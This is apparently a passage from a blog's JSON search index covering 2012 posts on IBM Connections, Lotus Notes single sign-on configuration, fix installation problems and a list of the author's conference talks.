1\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eThe http header shows following line for the download file and the name:\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-15-ibm-connections-file-download-with-ie-9-without-1-on-extension/","title":"IBM Connections: File download with IE 9 without \\[1\\] on extension"},{"body":"A good evening for my all time open things list.\nSjaak Ursinus postet the reason and solution why Chrome throws an error when you want to download from IBM Connections Files.\nAmanda Baumann postet the configuration to integrate Sametime Proxy in IBM Connections and use only IHS (IBM HTTPServer). No edge or squid is necessary.\nGreat job! Thanks a lot to both for sharing this information.\n","excerpt":"\u003cp\u003eA good evening for my all time open things list.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-10.lotus.com/ldd/lcforum.nsf/DateAllFlatWeb/1b49e91c56f15654c12579bb005023a3?OpenDocument\" target=\"_blank\"\u003eSjaak Ursinus postet the reason and solution \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n why Chrome throws an\nerror when you want to download from IBM Connections Files.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/8.1.1_Connections_integration_with_STProxy_for_chat_and_awareness\" target=\"_blank\"\u003eAmanda Baumann postet the configuration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to integrate Sametime Proxy\nin IBM Connections and use only IHS (IBM HTTPServer). No edge or squid\nis necessary.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eGreat job! Thanks a lot to both for sharing this information.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-09-two-things-solved-today/","title":"Two things solved today"},{"body":"I often install IBM Connections on localised operating systems, so normally DB2 control center get started with a non-english language.\nInterface language in DB2 control center can be changed through environment variable DB2LANG. After setting DB2LANG=EN and restart db2cc i get a english interface.\n","excerpt":"\u003cp\u003eI often install IBM Connections on localised operating systems, so\nnormally DB2 control center get started with a non-english language.\u003c/p\u003e\n\u003cp\u003eInterface language in DB2 control center can be changed through\nenvironment variable DB2LANG. After setting DB2LANG=EN and restart db2cc\ni get a english interface.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-07-changing-interface-language-in-db2-control-center/","title":"Changing interface language in DB2 Control Center"},{"body":"The last two weeks i installed two IBM Connections 3.0.1.\nAfter installing i went to IBM Fix Central and look for the latest fixes. There are 7 Fixes available and for Multi Mobile Patch it shows a superseded fix. So i decided to download patch one to seven and ignored july mobile update.\nI installed the fixes as ever.\nUpdating updateinstaller\nDisabled node synchronisation\nDisabled Application Server automatic starting\nshut down the Clusters\nsynchronize nodes\nand so on.\nAfter the installation i can’t use the mobile apps for iOS, android or Blackberry. The error messages shows “You have to install the July 2011 mobile patch to use this app.”\nI made a download on Fix Central again, because i thought i made an error to ignore the july patch (LO61851), so i mark LO64399 (October Patch) to download and activated “Include requisites: Yes” and got following download options:\nNo other patch is shown as prerequist for this mobile patch! But i downloaded july fix (LO61851) to test this one.\nI uninstalled LO64399 and startet again with LO61851. No success! After restarting i installed LO64399, but no mobile App works.\nShazza Bellamy gave me the hint to install the august mobile fix (LO63049). I searched on Fix Central, but no download was available. One of my colleagues stored the patch on our NAS and she sent it to me too. After uninstalling the other two mobile fixes i installed august fix (LO63049) and restartet again and what should i say? On both Connections Installations the mobile Apps are working.\nI don’t know why LO63049 isn’t available on Fix Central and i have no idea why LO61851 is not enough for mobile Apps on my new installations. I have older systems which are updated from 2.5 or 3.0 where only LO61851 is installed and mobile apps are working.\nPerhaps i can save you time with this post, because i invested some days on discovering the error and installing fixes again and again.\nUpdate: Today i read a post on IBM Developerworks, which describes the error and a solution. Sjaak Ursinus found the reason of the failing update: ifix LO64399 and Windows 2008 R2 ","excerpt":"\u003cp\u003eThe last two weeks i installed two IBM Connections 3.0.1.\u003c/p\u003e\n\u003cp\u003eAfter installing i went to \u003ca href=\"http://www-933.ibm.com/support/fixcentral\" target=\"_blank\"\u003eIBM Fix Central \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and look for the latest\nfixes. There are \u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Lotus\u0026amp;product=ibm/Lotus/Lotus\u0026#43;Connections\u0026amp;release=3.0.1.0\u0026amp;platform=Windows\u0026amp;function=all\u0026amp;source=fc\" target=\"_blank\"\u003e7 Fixes available \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and for Multi Mobile Patch it shows a\nsuperseded fix. So i decided to download patch one to seven and ignored\njuly mobile update.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/fixcentral1.png\" alt=\"fixcentral1\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI installed the fixes as ever.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpdating updateinstaller\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDisabled node synchronisation\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDisabled Application Server automatic starting\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eshut down the Clusters\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003esynchronize nodes\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eand so on.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eAfter the installation i can’t use the mobile apps for iOS, android or\nBlackberry. The error messages shows “You have to install the July 2011\nmobile patch to use this app.”\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-02-problems-with-mobile-fix-and-ibm-connections-3-0-1/","title":"Problems with Mobile Fix and IBM Connections 3.0.1"},{"body":"Last week a new blog editor for offline blogging has announced IBM Connections blogs support.\nBlogsy is a nice tool and costs about 4€ in apple app store.\nMy first tests are not very good, because Blogsy 3.3 has problems with multiple Blogs in IBM Connections. Only one day later, after some comments in Blogsy Blog, a new version can be downloaded from Appstore. Blogsy 3.3.1 can handle multiple Connections blogs, but the App crashes right after uploading a new post. I hope they will make a updated version soon.\nI enjoy offline blog editors very much, because i can prepare articles on train and upload them later after i found a free WLAN. This is my first non-test post with Blogsy. Integration is very good and you have quick access to web content, Youtube and Flickr.\n","excerpt":"\u003cp\u003eLast week a new blog editor for offline blogging has announced IBM\nConnections blogs support.\u003c/p\u003e\n\u003cp\u003eBlogsy is a nice tool and costs about 4€ in apple app store.\u003c/p\u003e\n\u003cp\u003eMy first tests are not very good, because Blogsy 3.3 has problems with\nmultiple Blogs in IBM Connections. Only one day later, after some\ncomments in Blogsy Blog, a new version can be downloaded from Appstore.\nBlogsy 3.3.1 can handle multiple Connections blogs, but the App crashes\nright after uploading a new post. I hope they will make a updated\nversion soon.\u003c/p\u003e\n\u003cp\u003eI enjoy offline blog editors very much, because i can prepare articles\non train and upload them later after i found a free WLAN. This is my\nfirst non-test post with Blogsy. Integration is very good and you have\nquick access to web content, Youtube and Flickr.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-02-26-first-steps-with-blogsy-on-ipad/","title":"First steps with blogsy on iPad"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/plugin%5C_customization.ini/","title":"Plugin\\_customization.ini"},{"body":"Some more points to my working configuration of Single Sign-On in Lotus Notes.\nAutomating configuration with plugin_customization.ini I do a lot of software tests with my productive Notes Client (on Mac OS), so i often delete the Expeditor-folder in ~/Library/Application Support/Lotus Notes Data/. So i place configuration details in /Applications/Notes.app/Contents/MacOS/rcp/plugin_customization.ini, then the settings get automatically applied.\n# Connections Config com.ibm.lconn.client.base/server=http\\://connections.example.com/profiles com.ibm.lconn.client.base/authtype=DOMINO-SSO com.ibm.lconn.client.base/dominosso.dominoresolveservername=false com.ibm.lconn.client.base/authserver=$hierarchical Domino-Server-Name$ com.ibm.lconn.client.base/dominosso.useclustermates=true com.ibm.lconn.client.base/dominosso.preferred.username.field=ShortName com.ibm.lconn.client.base/policy-mode=OVERWRITE com.ibm.lconn.client.base/enableConnectionsIntegration=true # Sametime Config com.ibm.collaboration.realtime.community/name=$Name for Community$ com.ibm.collaboration.realtime.community/host=$Hostname of Sametime Server$ com.ibm.collaboration.realtime.community/defaultAuthType=ST-DOMINO-SSO com.ibm.collaboration.realtime.community/authServerUrl=$hierarchical Domino Server Name$ com.ibm.collaboration.realtime.community/loginByToken=true com.ibm.collaboration.realtime.community/tokenLoginOnly=true com.ibm.collaboration.realtime.community/loginAtStartup=true com.ibm.collaboration.realtime.login/autologin=true com.ibm.collaboration.realtime.login/alwaysLoggedIn=true com.ibm.collaboration.realtime.imhub/disableExit=false # Status Updater Fix to show profile pictures com.ibm.lconn.statusupdates/download.image.enabled=true Sametime will only apply the settings of plugin_customization.ini, when following file is not present!\n~/Library/Application Support/Lotus Notes Data/Expeditor/Applications/.metadata/.plugins/com.ibm.collaboration.realtime.login/CANONICAL_NAME.xml Applying these settings through a Desktop setting document and policy You can apply this through a policy too, you have to add the values to a Desktop settings document. Syntax is described here: IBM KB 21407709 .\nThere is a bug in the desktop settings document until Notes / Domino 8.5.3, you can’t delete the entries.\nDetails:\nDomino 8.5.1 Custom Notes.Ini Settings still active SPR # RNOG84RS36 fixed in 8.5.2 release Comments on Detlef Poettgen tells, that error is still active in 8.5.2 FP3, i tested 8.5.3 and it works.\nPlease be aware, that Domino Directory allows stored forms and if you want to delete Managed Settings of an Desktop settings document which is created before 8.5.3, the error still occurs.\nPath in Windows Installations Expeditorfolder is NotesData\nPath to plugin_customization.ini: NotesProgram\n","excerpt":"\u003cp\u003eSome more points to my working configuration of Single Sign-On in Lotus\nNotes.\u003c/p\u003e\n\u003ch1 id=\"automating-configuration-with-plugin_customizationini\"\u003eAutomating configuration with plugin_customization.ini \u003ca href=\"#automating-configuration-with-plugin_customizationini\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eI do a lot of software tests with my productive Notes Client (on Mac\nOS), so i often delete the Expeditor-folder in ~/Library/Application\nSupport/Lotus Notes Data/. So i place configuration details in\n/Applications/Notes.app/Contents/MacOS/rcp/plugin_customization.ini,\nthen the settings get automatically applied.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# Connections Config\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/server=http\u003cspan style=\"color:#2aa198\"\u003e\\:\u003c/span\u003e//connections.example.com/profiles\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/authtype=DOMINO-SSO\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/dominosso.dominoresolveservername=\u003cspan style=\"color:#cb4b16\"\u003efalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/authserver=\u003cspan style=\"color:#268bd2\"\u003e$hierarchical\u003c/span\u003e Domino-Server-Name$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/dominosso.useclustermates=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/dominosso.preferred.username.field=ShortName\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/policy-mode=OVERWRITE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/enableConnectionsIntegration=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# Sametime Config\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/name=\u003cspan style=\"color:#268bd2\"\u003e$Name\u003c/span\u003e \u003cspan style=\"color:#859900\"\u003efor\u003c/span\u003e Community$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/host=\u003cspan style=\"color:#268bd2\"\u003e$Hostname\u003c/span\u003e of Sametime Server$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/defaultAuthType=ST-DOMINO-SSO\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/authServerUrl=\u003cspan style=\"color:#268bd2\"\u003e$hierarchical\u003c/span\u003e Domino Server Name$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/loginByToken=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/tokenLoginOnly=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/loginAtStartup=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.login/autologin=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.login/alwaysLoggedIn=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.imhub/disableExit=\u003cspan style=\"color:#cb4b16\"\u003efalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# Status Updater Fix to show profile pictures\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.statusupdates/download.image.enabled=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eSametime will only apply the settings of plugin_customization.ini, when\nfollowing file is \u003cstrong\u003enot\u003c/strong\u003e present!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-01-26-sametime-and-connections-plugins-in-lotus-notes/","title":"Sametime and Connections Plugins in Lotus Notes"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/single-sign-on/","title":"Single Sign On"},{"body":"Carl Tyler postet his view and thoughts:\nCarl Tyler’s Blog :: Lotusphere 2012 – How I see things ","excerpt":"\u003cp\u003eCarl Tyler postet his view and thoughts:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.iminstant.com/iminstant/iminstant.nsf/d6plinks/CTYR-8QTRHU\" target=\"_blank\"\u003eCarl\nTyler’s Blog :: Lotusphere 2012 – How I see things \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-01-25-carl-tylers-comment-to-lotusphere-2012/","title":"Carl Tyler’s comment to Lotusphere 2012"},{"body":"In only two weeks starts LCTY Edcom Nachlese 2012 in Munich.\nI prepare a session on Single Sign On in Notes / Domino environments.\nSo i had time to check some settings in Lotus Notes. Since 8.5.3 we have a new option Domino-SSO for Connections Plugin.\nI made several tests with my installed Notes Client on Mac OS, but i had no success. I tested with several settings in the preferences dialog and with different settings in plugin_customization.ini .\nI had one configuration where i can use Sametime Tokenbased Login and leave “Domino Single Sign-On Server” empty in connections preferences, but this works only with running Notes Client and i had to apply the setting again after restart the client.\nNow i deleted the Expeditor folder in my Notes Data to reconfigure the client. What should i say? The SSO-Server works now. I had to use the hierarchical Domino server name. It would be interesting, which technique is used here, because the Domino and Connections Server are in different domains, so it is no LTPA SSO.\nUpdate Only a short add-on. It is LTPA SSO, but i think domain from Web SSO document gets applied.\n","excerpt":"\u003cp\u003eIn only two weeks starts\n\u003ca href=\"http://www.edcom.de/ttacms.nsf/id/nachlese-2012-de\" target=\"_blank\"\u003eLCTY Edcom Nachlese\n2012 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Munich.\u003c/p\u003e\n\u003cp\u003eI prepare a session on Single Sign On in Notes / Domino environments.\u003c/p\u003e\n\u003cp\u003eSo i had time to check some settings in Lotus Notes. Since 8.5.3 we have\na new option Domino-SSO for Connections Plugin.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/01/connections-sso.png\" alt=\"connections sso\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI made several tests with my installed Notes Client on Mac OS, but i had\nno success. I tested with several settings in the preferences dialog and\nwith\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/Using_NotesINI_settings_to_configure_Connections_integration\" target=\"_blank\"\u003edifferent\nsettings in plugin_customization.ini \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI had one configuration where i can use Sametime Tokenbased Login and\nleave “Domino Single Sign-On Server” empty in connections preferences,\nbut this works only with running Notes Client and i had to apply the\nsetting again after restart the client.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-01-24-notes-client-8-5-3-and-domino-sso-for-connections-plugins/","title":"Notes Client 8.5.3 and Domino-SSO for Connections Plugins"},{"body":"2015 Social Connections 9 – Ehningen / Stuttgart IBM Connections Administration Admincamp 2015 IBM Connections Administration IBM Connections Best Practices Social Connections 8 – Boston Best and Worst Practices Deploying IBM Connections TDI Solution Deep Dive Engage 2015 in Genth, ICS.UG in Bremen ICSUG \u0026amp;#8211; Best and worst practices deploying IBM Connections, IBM ConnectED 2015 Bp203 Best and Worst practices deploying IBM Connections 2014 IBM Connect 2014 Practical Solutions for Connections Admins - Tips and Scripts for your daily business Engage IBM Connect 2014 - BP307 - Practical Solutions for Connections Administrators - Tips and Scripts for Your Daily Business BCCon Tipps Und Skripts aus dem Leben eines Connections Admins Social Connections VI Script it! - Basics to automate IBM WebSphere administration AdminCamp 2014 Notes 9 goes Connections IBM Connections Deep Dive DNUG IBM Connections Deepdive Social Connections VII IBM Connections Deepdive Use Connections Scripts to speed up Installation and Configuration 2013 Social Connections V Saving my time using scripts ICON UK Saving My Time Using Scripts (Extended) AdminCamp Saving my time using scripts Extended IBM Connections - Sicherheit \u0026amp; Administration DNUG – Social Collaboration 39: “Vernetzte Informationswelt” Sparen Sie Zeit bei der Administration von IBM Connections 50. Dannotes http://50.dannotes.dk Saving my time using scripts 2011 AdminCamp IBM Connections Installation unter Linux 2009 AdminCamp Netzwerküberwachung mit dem Open Source Tool Nagios ","excerpt":"\u003ch2 id=\"2015\"\u003e2015 \u003ca href=\"#2015\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"social-connections-9-8211-ehningen--stuttgart\"\u003eSocial Connections 9 – Ehningen / Stuttgart \u003ca href=\"#social-connections-9-8211-ehningen--stuttgart\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/soccnx9-CNXAdministration.pdf\" target=\"_blank\"\u003eIBM Connections Administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"admincamp-2015\"\u003eAdmincamp 2015 \u003ca href=\"#admincamp-2015\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/t3s1-ibmconnectionsadministration.pdf\" target=\"_blank\"\u003eIBM Connections Administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/t3s5-ibmconnectionsbestpractices.pdf\" target=\"_blank\"\u003eIBM Connections Best Practices \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"social-connections-8-8211-boston\"\u003eSocial Connections 8 – Boston \u003ca href=\"#social-connections-8-8211-boston\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/soccnx8-bestworstpractise.pdf\" target=\"_blank\"\u003eBest and Worst Practices Deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/soccnx8-tdideepdive.pdf\" target=\"_blank\"\u003eTDI Solution Deep Dive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"engage-2015-in-genth-icsug-in-bremen\"\u003eEngage 2015 in Genth, ICS.UG in Bremen \u003ca href=\"#engage-2015-in-genth-icsug-in-bremen\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/ICSUG-Best-and-worst-practices-deploying-IBM-Connections-english.pdf\" target=\"_blank\"\u003eICSUG \u0026amp;#8211; Best and worst practices deploying IBM Connections, \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"ibm-connected-2015\"\u003eIBM ConnectED 2015 \u003ca href=\"#ibm-connected-2015\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2015-01-bp203-bestandworstpracticesdeployingibmconnectionsfinal.pdf\" target=\"_blank\"\u003eBp203 Best and Worst practices deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2014\"\u003e2014 \u003ca href=\"#2014\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"ibm-connect-2014\"\u003eIBM Connect 2014 \u003ca href=\"#ibm-connect-2014\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-01-27-bp307.pdf\" target=\"_blank\"\u003ePractical Solutions for Connections Admins - Tips and Scripts for your daily business \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"engage\"\u003eEngage \u003ca href=\"#engage\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/practicalsolutionsforconnectionsadministrators-extended.pdf\" target=\"_blank\"\u003eIBM Connect 2014 - BP307 - Practical Solutions for Connections Administrators - Tips and Scripts for Your Daily Business \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"bccon\"\u003eBCCon \u003ca href=\"#bccon\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-adm01-tippsundskripts.pdf\" target=\"_blank\"\u003eTipps Und Skripts aus dem Leben eines Connections Admins \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"social-connections-vi\"\u003eSocial Connections VI \u003ca href=\"#social-connections-vi\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-06-16-scripting.pdf\" target=\"_blank\"\u003eScript it! - Basics to automate IBM WebSphere administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"admincamp-2014\"\u003eAdminCamp 2014 \u003ca 